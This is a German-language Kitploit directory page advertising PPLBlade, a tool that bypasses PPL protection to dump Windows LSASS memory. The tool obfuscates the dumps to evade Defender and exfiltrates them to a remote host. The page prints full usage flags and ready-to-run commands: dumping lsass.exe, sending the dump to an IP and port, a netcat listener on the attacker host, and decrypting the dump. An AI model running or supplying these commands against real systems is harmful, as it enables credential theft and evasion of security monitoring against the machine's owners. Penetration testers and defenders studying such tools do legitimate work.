Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PPLBlade — Umgeht den PPL-Schutz, um den LSASS-Prozessspeicher auszulagern, verschleiert Dump-Dateien mit XOR und exfiltriert sie remote über RAW oder SMB, ohne auf die Festplatte zu schreiben. | Kitploit
Tools/GitHubGitHub/tastypepperoni/pplblade
Privilege EscalationSpeicherforensikExploitationDatenexfiltrationPost-Exploitation
GitHubtastypepperoni/pplblade

PPLBlade

Umgeht den PPL-Schutz, um den LSASS-Prozessspeicher auszulagern, verschleiert Dump-Dateien mit XOR und exfiltriert sie remote über RAW oder SMB, ohne auf die Festplatte zu schreiben.

Repository anzeigen
597635vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PPLBlade

Protected Process Dumper Tool, das das Verschleiern von Speicherabbildern und deren Übertragung auf entfernte Arbeitsstationen unterstützt, ohne sie auf die Festplatte zu schreiben.

Wichtige Funktionen:

  1. Umgehen des PPL-Schutzes
  2. Verschleiern von Speicherabbilddateien, um die signaturbasierten Erkennungsmechanismen von Defender zu umgehen
  3. Hochladen von Speicherabbildern mit RAW- und SMB-Upload-Methoden ohne sie auf die Festplatte zu schreiben (dateiloser Dump)

Eine Übersicht über die in diesem Tool verwendeten Techniken finden Sie hier: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Beachten Sie, dass PROCEXP15.SYS in den Quelldateien für Kompilierungszwecke aufgeführt ist. Es muss nicht zusammen mit der PPLBlade.exe auf dem Zielcomputer übertragen werden.

Es ist bereits in die PPLBlade.exe eingebettet. Der Exploit ist nur eine einzelne ausführbare Datei.

Modi:

  1. Dump - Speicherabbild eines Prozesses unter Verwendung von PID oder Prozessnamen erstellen
  2. Decrypt - Eine verschleierte (--obfuscate) Dump-Datei in ihren ursprünglichen Zustand zurückversetzen
  3. Cleanup - Manuelle Bereinigung durchführen, falls bei der Ausführung etwas schiefläuft (Beachten Sie, dass die Optionswerte mit denen der Ausführung übereinstimmen sollten, die wir bereinigen möchten)
  4. DoThatLsassThing - lsass.exe mit dem Process Explorer-Treiber dumpen (einfacher PoC)

Handle-Modi:

  1. Direct - Öffnet einen PROCESS_ALL_ACCESS-Handle direkt mit der OpenProcess()-Funktion
  2. Procexp - Verwendet PROCEXP152.sys, um einen Handle zu erhalten
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Beispiele:

Einfacher PoC, der PROCEXP152.sys zum Dumpen von lsass verwendet:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Beachten Sie, dass es die Dump-Datei nicht XOR-verschlüsselt; fügen Sie ein zusätzliches --obfuscate-Flag hinzu, um die XOR-Funktionalität zu aktivieren)

Laden Sie den verschleierten LSASS-Dump auf einen entfernten Speicherort hoch:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Angreifer-Host:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Entschleiern des Speicherabbilds:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Tool herunterladen